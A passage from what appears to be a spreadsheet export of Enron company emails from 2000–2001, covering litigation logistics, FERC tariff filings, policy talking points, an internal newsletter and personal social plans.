Meringolo" &lt;PMeringolo@brobeck.com&gt;, "Robert C. Williams (E-mail)" _x000D_
&lt;Robert.C.Williams@enron.com&gt;, "Susan Bisop (E-mail)" _x000D_
&lt;sbishop@gibbs-bruns.com&gt;_x000D_
		 Subject: Defense Group Internet Site_x000D_
_x000D_
_x000D_
I am writing for your approval to enter into an agreement on behalf of Enron_x000D_
and the Enron outside counsel to enable all of us to have access to the_x000D_
joint work product website for the Gordon Hendricks group.  The Website will_x000D_
have the following information:_x000D_
_x000D_
Event Calendar_x000D_
Docket and pleadings for Electricity Litigation around the West_x000D_
Pleadings in the major cases we are all in_x000D_
Repository for all working drafts of documents_x000D_
Repository for letters that are now circulated as attachments_x000D_
_x000D_
In the future, some defendants may use this system for actual document_x000D_
productions to government agencies etc._x000D_
_x000D_
As I see it, we really have not choice but to join this system if we are_x000D_
going to participate in the joint defense group.  Shortly they will stop_x000D_
circulating work product etc. via email and will rely upon this website_x000D_
instead._x000D_
_x000D_
The costs are somewhat unclear but it is intended to be an economy of scale_x000D_
cost sharing concept._x000D_
_x000D_
They cannot start the program until we all sign up and so they are asking_x000D_
for a quick response._x000D_
_x000D_
Thanks_x000D_
Gary_x000D_
 &lt;&lt;agreement.pdf&gt;&gt;_x000D_
_x000D_
=======================================================_x000D_
This email message is for the sole use of the intended recipient(s) and may _x000D_
contain confidential and privileged information. Any unauthorized review, _x000D_
use, disclosure or distribution is prohibited. If you are not the intended _x000D_
recipient, please contact the sender by reply email and destroy all copies of _x000D_
the original message._x000D_
_x000D_
To reply to our email administrator directly, send an email to _x000D_
postmaster@brobeck.com_x000D_
BROBECK PHLEGER &amp; HARRISON LLP_x000D_
http://www.brobeck.com_x000D_
_x000D_
_x000D_
_x000D_
 - agreement.pdf_x000D_
</t>
  </si>
  <si>
    <t>Wed, 26 Apr 2000 04:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'timothy.blanchard@enron.com', 'brian.hoskins@enron.com', 'lenine.jeganathan@enron.com', 'hector.campos@enron.com'})</t>
  </si>
  <si>
    <t>I'm Having a Party!</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Eric Bass/HOU/ECT on 04/26/2000 11:11 AM _x000D_
---------------------------_x000D_
   _x000D_
	Enron North America Corp._x000D_
	_x000D_
	From:  Courtney Votaw @ EES                           04/26/2000 10:08 AM_x000D_
	_x000D_
_x000D_
To: Julie Davidson/HOU/EES, Julie Ferrara/HOU/ECT@ECT, Andrea _x000D_
Larsen/HOU/AZURIX@AZURIX@ENRON, Nicole Alvino/HOU/ECT@ECT, Ashley Dietz/Enron _x000D_
Communications@Enron Communications, Katie Stowers/HOU/ECT@ECT, Andrew _x000D_
Miles/HOU/EES@EES, John Van Gelder/HOU/EES, Glenn Surowiec/Enron _x000D_
Communications@Enron Communications, Palmer Letzerich/Enron _x000D_
Communications@ENRON COMMUNICATIONS@ENRON, Matthew Lenhart/HOU/ECT@ECT, _x000D_
Margaret Allen/Corp/Enron@ENRON, Eric Bass/HOU/ECT@ECT, Kyle _x000D_
Smith/HR/Corp/Enron@ENRON, "John Andell" &lt;jandell@jhib.com&gt; @ ENRON, "Michael _x000D_
Galiunas" &lt;MGALIUN@vastar.com&gt; @ ENRON, "Robert Garcia" _x000D_
&lt;Robert_Garcia@enron.com&gt; @ ENRON, "Kara Lynn Holmes" _x000D_
&lt;kholmes@mail.db.uth.tmc.edu&gt; @ ENRON, "Howard, Patrick" _x000D_
&lt;HowardP@kochind.com&gt; @ ENRON, "Robinson, Jesse" &lt;Jesse.Robinson@trinity.edu&gt; _x000D_
@ ENRON, Kevin Swantkowski &lt;kswantkowski@emerging.com&gt; @ ENRON, "Curtis _x000D_
Willeford" &lt;curtiswilleford@hotmail.com&gt; @ ENRON, bwoodwar@central.uh.edu, _x000D_
"Lee Zieben" &lt;leezieben@hotmail.com&gt; @ ENRON, jhcl@dynegy.com, Chad _x000D_
Starnes/Corp/Enron@ECT, Billy Braddock/Enron Communications@Enron _x000D_
Communications, dwighthelms@aol.com, Michael Stockton/HOU/ECT@ECT, Janel _x000D_
Guerrero/Corp/Enron@Enron_x000D_
cc:  _x000D_
Subject: I'm Having a Party!_x000D_
_x000D_
What: The Shell Houston Open Golf Tournament Party!_x000D_
_x000D_
When: Saturday, April 29th-  All day!_x000D_
_x000D_
Where: My parent's house in the Woodlands (across the street from the 11th _x000D_
hole)_x000D_
_x000D_
Details: Food and Beverages will be provided._x000D_
 Bring your swim suit_x000D_
 Passes are $50 for the entire week. We have a few extras and we can take _x000D_
turns walking around the course_x000D_
 After party- Pappa's Ice House in the Woodlands, Duck Soup will be playing_x000D_
_x000D_
A few people are meeting at my apartment on Saturday around 11:00 so we can _x000D_
car-pool to the Woodlands. Parking is limited._x000D_
Feel free to pass this on, the more the merrier!_x000D_
_x000D_
If you need directions to my apartment or my house in the Woodlands, please _x000D_
call._x000D_
If you could, let me know by Friday if you plan on attending and if you are _x000D_
bringing anyone. _x000D_
Home: 713-383-6436_x000D_
Work: 713-853-9390_x000D_
_x000D_
Hope to see yall on Saturday!!_x000D_
_x000D_
Courtney_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 2 Jan 2002 09:12:42 -0800 (PST)</t>
  </si>
  <si>
    <t>NGPL Contact</t>
  </si>
  <si>
    <t>Greetings  Susan_x000D_
_x000D_
I need to work on releasing our NGPL capacity - do you have a  contact there and do you have access to their bulletin board?</t>
  </si>
  <si>
    <t>Mon, 8 Jan 2001 10:16:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'james.hughes@enron.com', 'rebecca.mcdonald@enron.com'})</t>
  </si>
  <si>
    <t>Talking points for US Ambassador</t>
  </si>
  <si>
    <t xml:space="preserve">In advance of Ken's phone call to Ambassador Celeste in Delhi, I have _x000D_
prepared a brief one-page summary of the current situation as talking points _x000D_
for Ken._x000D_
_x000D_
_x000D_
 _x000D_
_x000D_
For convenience, I also attach the talking points we provided to Ken's office _x000D_
in advance of his earlier conversation with the Ambassador._x000D_
_x000D_
_x000D_
_x000D_
Ashok Mehta in our Delhi office has spoken with the Ambassador. He is booked _x000D_
with official engagements on Monday evening, India time, but would be _x000D_
available on Tuesday morning, India time, 8:00am, which translates to Monday _x000D_
evening, Houston time, 8:30 pm. If this works for Ken's schedule, the _x000D_
telephone number he requested we call is -- _x000D_
_x000D_
US Embassy_x000D_
011-91-11-419-8000_x000D_
Tell the operator that this is a previously arranged call with Ambassador _x000D_
Celeste_x000D_
_x000D_
For your information, I have a separate meeting with Ambassador Celeste on _x000D_
Thursday afternoon, January 11, in Delhi. At our request, he had earlier _x000D_
agreed to a full update on the Dabhol project. This update was originally _x000D_
scheduled for last Wednesday, but his schedule changed, and we rescheduled _x000D_
for this coming Thursday._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Dec 2000 03:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: TW</t>
  </si>
  <si>
    <t xml:space="preserve">I think the example of when quantities may be subject to transportation and _x000D_
fuel is when an Operator overpulls at a delivery point and then cashes out _x000D_
the imbalance, TW could be out the transport and fuel.  For example,  _x000D_
_x000D_
  DP is SoCal/Needles: scheduled volume is 700,000/d_x000D_
     actual volume delivered is 720,000/d_x000D_
     imbalance is 20,000/d, SoCal owes TW_x000D_
     TW collects transport &amp; fuel on 700,000/d (bill on scheduled volume)_x000D_
     SoCal cuts a check to TW for dollar value of 20,000/d_x000D_
     TW doesn't collect transport &amp; fuel on 20,000/d_x000D_
  Payback in-kind doesn't have this problem:_x000D_
     The 20,000/d transport gets scheduled at Needles, TW collects the _x000D_
transport &amp; fuel      (bill on scheduled volume), but we physically give _x000D_
SoCal 20,000/d less on that day_x000D_
_x000D_
Is this the correct example?  I'm copying Lynn Blair to verify._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Susan Scott_x000D_
12/06/2000 09:20 AM_x000D_
To: Drew Fossum/ET&amp;S/Enron@ENRON_x000D_
cc: Maria Pavlou/ET&amp;S/Enron@ENRON, Mary Kay Miller/ET&amp;S/Enron@ENRON, Glen _x000D_
Hass/ET&amp;S/Enron@ENRON, Mary Darveaux/ET&amp;S/Enron@ENRON, Lindy _x000D_
Donoho/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject: Re: TW  _x000D_
_x000D_
We did not answer protests to our Order 637 filing._x000D_
_x000D_
The gist of PNM's protest in RP00-626 is that we shouldn't be able to charge _x000D_
a transport or fuel fee for our imbalance netting and trading service.  I _x000D_
agree with PNM that our tariff language is vague in this regard.  What _x000D_
exactly do we mean by "no additional cost...unless through the allocation _x000D_
process, quantities may be subject to transportation and fuel"??   Can _x000D_
someone help me with this?_x000D_
_x000D_
Since we really did not want to make this compliance filing anyway, I would _x000D_
say we probably wouldn't mind if FERC rejected our tariff sheet outright.  _x000D_
However, it's more likely that they will just instruct us to clarify our _x000D_
language.  Or they could tell us to remove the "subject to transportation and _x000D_
fuel" provision.  If we want to preserve our right to charge transport and _x000D_
fuel, it might be worthwhile filing something in the way of an answer.  _x000D_
However, I am going to need some assistance in understanding what the _x000D_
language means and why we think we can do it, so I can justify it to FERC.  _x000D_
Any comments you have in this regard would be appreicated._x000D_
_x000D_
_x000D_
   _x000D_
	_x000D_
	_x000D_
	From:  Drew Fossum                           12/05/2000 05:18 PM_x000D_
	_x000D_
_x000D_
To: Maria Pavlou/ET&amp;S/Enron@ENRON, Susan Scott/ET&amp;S/Enron@ENRON_x000D_
cc: Mary Kay Miller/ET&amp;S/Enron@ENRON, Glen Hass/ET&amp;S/Enron@ENRON, Mary _x000D_
Darveaux/ET&amp;S/Enron@ENRON _x000D_
_x000D_
Subject: TW_x000D_
_x000D_
Should we respond to PNM's protest of the dollar valuation of imbalances _x000D_
prior to netting and trading?  Did we already respond to this issue when they _x000D_
filed their protest of the 637 filing?  DF _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 13 Jun 2001 15:23:30 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: cabo</t>
  </si>
  <si>
    <t>This is the info.-  Kim Hillis is making the reservations (I hope there are rooms available this late)    A couple guys here have stayed there and said it's awesome.  With a great beach, close to town and golf. There's jet skis and boats right there.  I'm up for chartering a a catamaran for snorkeling and cruisin' all day._x000D_
_x000D_
http://www.mexicotravelnet.com/loscabos/hotels/meliasanlucas.htm_x000D_
_x000D_
http://www.cabofishingvacations.com/melia.htm_x000D_
 -----Original Message-----_x000D_
From: 	Davis, Mark Dana  _x000D_
Sent:	Wednesday, June 13, 2001 11:51 AM_x000D_
To:	Swerzbin, Mike_x000D_
Subject:	cabo_x000D_
_x000D_
When you get a chance, would you send the accomodation info over to us east power boys.  _x000D_
_x000D_
Thanks, _x000D_
_x000D_
Dana, Fletch, Rob</t>
  </si>
  <si>
    <t>Wed, 17 Jan 2001 05:10:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'ges@houston.rr.com'})</t>
  </si>
  <si>
    <t>Reply - NCL Update</t>
  </si>
  <si>
    <t xml:space="preserve">Technology is wonderful - I can log on here in the London office just as I do _x000D_
in Houston.  I feel very in touch.  Sounds like you have been busy - I think _x000D_
that the variety of items for the Sunday meeting sounds good.   Thanks for _x000D_
taking care of all of this.  _x000D_
_x000D_
London is cold but sunny - so very nice.  I do love coming here - hope to _x000D_
make the trip once a quarter this year.  I will be back at home by Friday _x000D_
evening, so let me know if there is anything that I can do before the _x000D_
meeting.  Otherwise I will see you on Sunday. _x000D_
_x000D_
Too bad that Nancy doesn't want the input from  the girls on presentation.  I _x000D_
think that taking likes and dislikes would be good - no commitment to make _x000D_
changes that the girls' might suggest, but I think that it would be wonderful _x000D_
to have their input.  They are the honorees.  Oh, well .....as you say, this _x000D_
is volunteer work and probably not worth getting too worked up over the whole _x000D_
thing.  --Sally _x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Gary Smithey" &lt;ges@houston.rr.com&gt; on 01/17/2001 12:47:01 PM_x000D_
To: &lt;sally.beck@enron.com&gt;_x000D_
cc:  _x000D_
Subject: NCL-Not urgent_x000D_
_x000D_
_x000D_
_x000D_
Sally:? Hope all is well in London, it could not be more  "soupy", rainy or _x000D_
overcast than it has been here.? Sunday is shaping  up...Nancy at Elegant _x000D_
Accessories by Nancy has a presentation for us, but is  unable to give it due _x000D_
to market or show or something.? I will pick it up  from her and run through _x000D_
it on Sunday.? I am trying to get Debbie VanDyke  to do Habitat and the lady _x000D_
from Applause to come.? Have been working on  form for Nominations...The _x000D_
meeting is at Nancy Galante's house, I have spoken to  her about the girls _x000D_
listing favorite things from Sat. pm and she was (nicely)  opposed to that, _x000D_
as the girls really only get limited choices---oops.? She  did tell me, _x000D_
however, that three girls have already selected dresses...(are we  already _x000D_
behind?) and she will speak briefly on dresses and registration and ask  for _x000D_
questions._x000D_
At Mondays patroness meeting (which was pretty non-newsy), I  gave all Jr. _x000D_
moms a "heads-up"? that March meeting would be at dress  shop,or bridal shop, _x000D_
and that they would be invited, just for scheduling  purposes._x000D_
?_x000D_
I have spoken with Barb Lindsey..a NCL member whose husband is  with Houston _x000D_
Police Dept.? He is realitivly cool, as far as a dad police  combo, but does _x000D_
have girl and boy twins in college, so he knows  teen-agers.? He is willing _x000D_
to talk to girls about what to do in case of  accident, when to leave your _x000D_
car, safety and so on...thought we could tie that  in with car maintenance _x000D_
meeting._x000D_
?_x000D_
I will let you know as the Sunday plans progress, I am afraid  that this is _x000D_
going to be a "catch-all".? Know you are busy, no need to  respond, call _x000D_
Friday pm or Saturday if you have questions._x000D_
?_x000D_
Linda_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 8 Jun 2000 12:00:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Re: How's it looking?</t>
  </si>
  <si>
    <t xml:space="preserve">Sorry it took so long._x000D_
_x000D_
_x000D_
_x000D_
Robin_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Ryan Watt_x000D_
06/08/2000 06:49 PM_x000D_
To: Robin Rodrigue/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: How's it looking?_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 25 Oct 2000 02:06:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Fwd: Gramm changes to House passed CEA Bill</t>
  </si>
  <si>
    <t>Rosalee,_x000D_
_x000D_
Our understanding of Sen. Gramm's position on the commodities legislation has _x000D_
changed significantly.  Before Dr. Lay calls the Senator, he should get the _x000D_
update from Steve Kean.  _x000D_
_x000D_
Thank you_x000D_
----- Forwarded by Tom Briggs/NA/Enron on 10/25/2000 08:03 AM -----_x000D_
_x000D_
	RAISLERK@sullcrom.com_x000D_
	10/25/2000 07:52 AM_x000D_
		 _x000D_
		 To: tom.briggs@enron.com_x000D_
		 cc: _x000D_
		 Subject: Fwd: Gramm changes to House passed CEA Bill_x000D_
_x000D_
_x000D_
Please find attached Part 2 of the Gramm staff proposed changes to the House_x000D_
passed CEA bill. &lt;&lt;Gramm changes 2.pdf&gt;&gt;_x000D_
_x000D_
_x000D_
_x000D_
----------------------------------_x000D_
_x000D_
This e-mail is sent by a law firm and contains information_x000D_
that may be privileged and confidential. If you are not the_x000D_
intended recipient, please delete the e-mail and notify us_x000D_
immediately._x000D_
_x000D_
 - Gramm changes 2.pdf</t>
  </si>
  <si>
    <t>Thu, 5 Apr 2001 16:37:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>BUSINESS HIGHLIGHTS_x000D_
_x000D_
Enron Industrial Markets_x000D_
Enron Industrial Markets has recently completed the first transaction for a=_x000D_
=20_x000D_
new 60-day fixed price product for the lumber industry. Available for=20_x000D_
delivery in Houston and Dallas, the product is offered by Enron in the=20_x000D_
over-the-counter market and via Clickpaper.com, Enron=01,s Internet-based=_x000D_
=20_x000D_
transaction system dedicated to the forest products industry. The first=20_x000D_
transaction was completed via Clickpaper.com on March 14 with a major lumbe=_x000D_
r=20_x000D_
buyer in the southern United States. This represents the first online fixed=_x000D_
=20_x000D_
price transaction contract in the industry. With the growing volatility in=_x000D_
=20_x000D_
the lumber industry, the availability of a long-term fixed price product=20_x000D_
provides companies with another opportunity to mitigate their exposure.=20_x000D_
Additionally, this transaction represents the convergence of Enron=01,s=20_x000D_
increasing involvement in physical lumber transactions with our recognized=_x000D_
=20_x000D_
expertise in financial risk management._x000D_
_x000D_
In addition, EIM has announced that it has completed its acquisition of the=_x000D_
=20_x000D_
Quebec City, Canada newsprint mill and related assets from Daishowa Forest=_x000D_
=20_x000D_
Products Ltd. In July 2000, Enron purchased Garden State Paper, a recycled=_x000D_
=20_x000D_
newsprint mill located in Garfield, NJ. The acquisition of the Daishowa mil=_x000D_
l=20_x000D_
now positions Enron as the seventh largest producer of newsprint in North=_x000D_
=20_x000D_
America. The Daishowa mill in Quebec City will now be called Papiers=20_x000D_
Stadacona. The new name has great historical significance to the local=20_x000D_
community in Quebec City. When Jacques Cartier first explored the mouth of=_x000D_
=20_x000D_
the St. Charles River in 1535, the aboriginal people living there referred =_x000D_
to=20_x000D_
the village as Stadacona. This is now the site of modern-day Quebec City.=_x000D_
=20_x000D_
_x000D_
Enron Freight Markets_x000D_
In March, Enron Freight Markets (EFM) completed the acquisition of Webmodal=_x000D_
,=20_x000D_
Inc to help launch the traditional intermediary transportation business.  E=_x000D_
FM=20_x000D_
also started its spot trading business and completed 981 transactions in it=_x000D_
s=20_x000D_
first month._x000D_
_x000D_
East Power Origination_x000D_
On Tuesday, April 3, the St. Lucie County Commission voted 3-2 to approve t=_x000D_
he=20_x000D_
Midway Energy Center near Fort Pierce, Florida, which is a 510 megawatt=20_x000D_
peaking power plant.  Next steps for this facility include receiving a wate=_x000D_
r=20_x000D_
permit from the South Florida Water Management District and an Environmenta=_x000D_
l=20_x000D_
Resource Permit (ERP) from the Florida Department of Environmental Protecti=_x000D_
on._x000D_
_x000D_
Enron Canada_x000D_
Ken Lay addressed a breakfast meeting of the Toronto Board of Trade on=20_x000D_
Wednesday, April 4, as part of the "Power Breakfast Series".  His topic was=_x000D_
=20_x000D_
"Moving Forward with Electricity Deregulation."  Before his speech, the=20_x000D_
chairman of the Board of Trade commented that "this was the best attendance=_x000D_
=20_x000D_
ever" at one of their breakfast meetings.  After the meeting, Mr. Lay spoke=_x000D_
=20_x000D_
with reporters from Reuters, the Globe and Mail, the National Post, and=20_x000D_
Report on Business TV emphasizing Enron's commitment to deregulation of the=_x000D_
=20_x000D_
Ontario power market._x000D_
_x000D_
IN THE NEWS_x000D_
_x000D_
JAPAN: Enron presents power plant plan to Japan government_x000D_
TOKYO, U.S.-based Enron Corp on Wednesday presented plans to build a=20_x000D_
liquefied natural gas (LNG) fired power plant in northern Japan, aiming to=_x000D_
=20_x000D_
become the first foreign company to build such a plant in Japan. The move=_x000D_
=20_x000D_
brings Enron one step closer to realizing its plan to build a power plant=_x000D_
=20_x000D_
with an initial capacity of two million kilowatts in Aomori prefecture._x000D_
"We submitted our basic plan to build the plant to the governor of Aomori=_x000D_
=20_x000D_
prefecture today in line with last November's announcement," Tatsuro Seguch=_x000D_
i,=20_x000D_
president of Enron Corp's Japanese affiliate Encom Corp, told a news=20_x000D_
conference. "We are aiming to start construction of the plant in 2004 and=_x000D_
=20_x000D_
start operations by 2007 since Japan's power market is one of our highest=_x000D_
=20_x000D_
priorities," he said.    03/28/2001  Reuters English News Service   (C)=20_x000D_
Reuters Limited 2001._x000D_
_x000D_
_x000D_
WELCOME_x000D_
New Hires_x000D_
EGM  - Lyelle Bellard, Damian Nelson, Edward Soo, Jonathan Whitehead_x000D_
EIM   - Elsa Aguilar, Melia Dickson, John Hark, Phaedra Jones, Maricar Jose=_x000D_
,=20_x000D_
Ian McCrory, Mirella Bertrone, Roland Holub, Arthur Miller, Miriam Watson,=_x000D_
=20_x000D_
           Richard Albert, Randy Biagini, Thomas Duchnicki, Diego Tabbachin=_x000D_
o_x000D_
ENA  - Mitra Mujica, Karen Phillips, Sarah Domonoskie, Kelly Donlevy-Lee_x000D_
_x000D_
Transfers (to or within)=20_x000D_
ENA - John Moore, Mitchell Robinson, Larry Valderrama, Holden Salisbury,=20_x000D_
Grace Rodriguez, Mary Martinez, Dominic Carolan, Kari Oquinn, Katherine=20_x000D_
Kelly,    David Fuller, Anguel Grigorov, Oren Zimmerman, Chuanli Deng, Glen=_x000D_
n=20_x000D_
Surowiec, Tharsilla Broussard, Geynille Dillingham, Philip Conn, Lola=20_x000D_
Weller,   Christina Brandli, Noemi Camacho, Randel Young, Ina Rangel_x000D_
EGM - Shelia Benke, Homer Lin, William McKone, William Berkeland, Valarie=_x000D_
=20_x000D_
Curry, Tomas Tellez_x000D_
EIM - Allen Ueckert, John W. Jennings, Sarveen Kohli_x000D_
_x000D_
_x000D_
NUGGETS &amp; NOTES_x000D_
_x000D_
The next EWS Brown Bag is scheduled for April 19 with Tim Battaglia=20_x000D_
discussing the steel industry._x000D_
_x000D_
_x000D_
LEGAL STUFF_x000D_
The information contained in this newsletter is confidential and proprietar=_x000D_
y=20_x000D_
to Enron Corp. and its subsidiaries.  It is intended for internal use only=_x000D_
=20_x000D_
and should not be disclosed.</t>
  </si>
  <si>
    <t>Thu, 25 Oct 2001 08:53:17 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'michele.raque@enron.com'})</t>
  </si>
  <si>
    <t>http://www.milberg.com/enron/complaint.pdf_x000D_
_x000D_
_x000D_
Look at the bottom of pages 18 and page 19</t>
  </si>
  <si>
    <t>Mon, 9 Oct 2000 02:24:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'kdavis2075@aol.com'})</t>
  </si>
  <si>
    <t>Re: Hello sugar pudding</t>
  </si>
  <si>
    <t>Hi Mommy!  Yes you may make a grilled cheese sandwich but get off the _x000D_
internet while you are doing it.  I want to be able to call you during this _x000D_
time.</t>
  </si>
  <si>
    <t>Mon, 30 Apr 2001 22:10:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'alan.comnes@enron.com', 'ozzie.pagan@enron.com', 'rogers.herndon@enron.com', 'steve.walton@enron.com', 'reagan.rorschach@enron.com', 'dave.mangskau@enron.com', 'tom.chapman@enron.com', 'donna.fulton@enron.com', 'tom.hoatson@enron.com', 'george.mccormick@enron.com', 'sarah.novosel@enron.com', 'dan.staines@enron.com', 'mary.hain@enron.com', 'heather.kroll@enron.com', 'kerry.stroup@enron.com', 'steve.montovano@enron.com', 'susan.mara@enron.com', 'thane.twiggs@enron.com', 'richard.shapiro@enron.com', 'aleck.dadson@enron.com', 'jeff.brown@enron.com', 'berney.aucoin@enron.com', 'david.fairley@enron.com', 'ron.mcnamara@enron.com', 'jennifer.bagwell@enron.com', 'janine.migden@enron.com', 'mike.roan@enron.com', 'edith.cross@enron.com', 'bill.rust@enron.com', 'howard.fromer@enron.com', 'billy.braddock@enron.com', 'daniel.allegretti@enron.com', 'joseph.wagner@enron.com', 'james.steffes@enron.com', 'wjennin@enron.com', 'elizabeth.johnston@enron.com', 'jean.ryall@enron.com', 'joe.connor@enron.com', 'joe.hartsoe@enron.com', 'kevin.presto@enron.com'})</t>
  </si>
  <si>
    <t>SPP REHEARING</t>
  </si>
  <si>
    <t xml:space="preserve">Attached below is EPMI's request to FERC for clarification that SPP should _x000D_
not proceed with spending $45 million to implement a market design until FERC _x000D_
approves SPP as an RTO and establishes the independent board.  Our request _x000D_
uses FERC's ruling telling Gridflorida not to do this.  (We also filed a _x000D_
similar request in GridSouth last month.) _x000D_
---------------------- Forwarded by Christi L Nicolay/HOU/ECT on 05/01/2001 _x000D_
04:56 AM ---------------------------_x000D_
_x000D_
_x000D_
"Cindy Engelbrecht" &lt;cengelbrecht@bracepatt.com&gt; on 04/27/2001 05:22:22 PM_x000D_
To: &lt;CNicola@enron.com&gt;, &lt;dfulton@enron.com&gt;, &lt;elinnell@enron.com&gt;, _x000D_
&lt;snovose@enron.com&gt;, &lt;editor@restructuringtoday.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: SPP REHEARING CLARIFICATION RT01-34_x000D_
_x000D_
_x000D_
As filed today._x000D_
_x000D_
 - SPPREHEA.WPD_x000D_
</t>
  </si>
  <si>
    <t>Thu, 24 Aug 2000 05:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Talking Points re "reregulation" in California</t>
  </si>
  <si>
    <t xml:space="preserve">Here are all three documents I sent to Peter. _x000D_
_x000D_
Gavin_x000D_
---------------------- Forwarded by Gavin Dillingham/ENRON_DEVELOPMENT on _x000D_
08/24/2000 12:48 PM ---------------------------_x000D_
_x000D_
_x000D_
_x000D_
Gavin Dillingham_x000D_
08/24/2000 12:48 PM_x000D_
To: Peter Styles@ECT_x000D_
cc:  _x000D_
_x000D_
Subject: Talking Points re "reregulation" in California_x000D_
_x000D_
Peter, attached are three documents that Steve Kean said could be used for _x000D_
external communication concerning the California Power Issue. The first one _x000D_
is talking points from Jeannie Mandelker, following that is Steve's message _x000D_
to the Executive Committee, and the final attachment, at the bottom of the _x000D_
page, are talking points from Jeff Dasovich._x000D_
_x000D_
Let me know if you need further information._x000D_
_x000D_
Regards,_x000D_
_x000D_
Gavin_x000D_
_x000D_
_x000D_
_______________________________________________________________________________x000D_
_________________________________________________________x000D_
To: Executive Committee_x000D_
_x000D_
Subject: Talking Points re "reregulation" in California_x000D_
_x000D_
As I promised this morning at the executive committee meeting, below are some _x000D_
talking points for your use._x000D_
_x000D_
Overall message:  the market is working, regulation is not._x000D_
_x000D_
In California, peak demand rose by 10% over the last 4 years while new _x000D_
capacity grew by only 2%.  But, as you would expect, the market responded by _x000D_
proposing 8,000MW of new generation - - more than enough to offset the peak _x000D_
demand growth.  The regulatory process, at both the state and local level, _x000D_
has failed to site this new generation.  The problem is regulation, not _x000D_
deregulation._x000D_
_x000D_
When San Diego customers began experiencing the effects of higher prices, _x000D_
Enron responded with a fixed price which would have shielded San Diego _x000D_
customers from price volatility and provided prices below their current _x000D_
summer levels (Enron's price was about $55/MWH).  After publication of _x000D_
Enron's offer, nine other companies made offers.  Again, the market responded _x000D_
where regulation failed.  San Diego has not accepted any of these offers _x000D_
because of regulatory/legislative restrictions on its ability to buy outside _x000D_
of the PX (i.e. the spot market)._x000D_
_x000D_
In markets where siting is easier, suppliers have moved to build additional _x000D_
generation.  Enron built 3 plants in response to the 1998 price spikes.  _x000D_
Those plants were planned, sited and built in less that 12 months - - in time _x000D_
for the summer of 1999.  Where regulatory hurdles are lower, the market _x000D_
responds._x000D_
_x000D_
The solution to current pricing and reliability issues is more competition _x000D_
not reregulation.  Policy makers should:_x000D_
_x000D_
Open the transmission grid so that power can get from where it is to where it _x000D_
is needed._x000D_
_x000D_
Expedite interconnection of new generation._x000D_
_x000D_
Expedite siting of new facilities._x000D_
_x000D_
Give customers a choice, so that they have better access to demand side _x000D_
solutions._x000D_
_x000D_
_x000D_
Also attached is a more detailed discussion of California, prepared by Jeff _x000D_
Dasovich of our San Francisco office._x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 2 Oct 2000 11:07:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ssher5dun@aol.com'})</t>
  </si>
  <si>
    <t>L'shanah tovah! - from Anita &amp; Steve</t>
  </si>
  <si>
    <t>Hello! Anita &amp; Steve has just sent you a greeting card from Bluemountain.com._x000D_
_x000D_
You can pick up your personal message here:_x000D_
_x000D_
http://www1.bluemountain.com/cards/box6465d/sgg5xvzpepukty.htm_x000D_
_x000D_
Your card will be available for the next 90 days_x000D_
This service is 100% FREE! :) Have a good day and have fun!_x000D_
_x000D_
_________________________________________________________________________x000D_
Accessing your card indicates agreement with Blue Mountain's Website Rules:_x000D_
http://www.bluemountain.com/home/WebsiteRules.html_x000D_
_x000D_
Send FREE Blue Mountain greeting cards to friends and family_x000D_
http://www.bluemountain.com</t>
  </si>
  <si>
    <t>Fri, 26 Oct 2001 07:50:43 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Questar Southern Trails Data Room OCT 29 - 30 (Monday and_x000D_
 Tuesday)</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
I'll change the list.  Thanks for getting back to me._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Chandler, Bob  _x000D_
Sent:	Friday, October 26, 2001 9:11 AM_x000D_
To:	McConnell, Mark_x000D_
Cc:	Watson, Kimberly_x000D_
Subject:	RE: Questar Southern Trails Data Room OCT 29 - 30 (Monday and Tuesday)_x000D_
_x000D_
I will be on vacation during that time period and am not planning to go to the data room._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	McConnell, Mark  _x000D_
Sent:	Thursday, October 25, 2001 10:34 AM_x000D_
To:	Watson, Kimberly; Abdmoulaie, Mansoor; Brassfield, Morris; Huber, Lee; Chandler, Bob; Centilli, James; Ratner, Michael; Guthrie, Robert; Rice, Greek; Hawkins, Don; Jones, Nyree; Dowd, Stephen; Stephens, LD; Gleffe, Larry; Ames, Mike; Schick, Warren; Huber, Lee; Campbell, Larry_x000D_
Cc:	Harris, Steven; Alters, Dennis; Rapp, Bill; Hayslett, Rod; Sandt, Jim; Saunders, James_x000D_
Subject:	Questar Southern Trails Data Room OCT 29 - 30 (Monday and Tuesday)_x000D_
_x000D_
_x000D_
We will be able to attend the Questar Southern Trails data room on Monday and Tuesday (Oct 29th and 30th) as originally planned.  If you only need one day, please let me know which day you'll be attending._x000D_
_x000D_
Questar is located at 180 East 100 South, Salt Lake City, Utah.  Our main contacts are Jodi Starley at (801) 324-2082 and Gary Schmitt at (801) 324-2082. The hours of the data room are 8:00 - 4:00. _x000D_
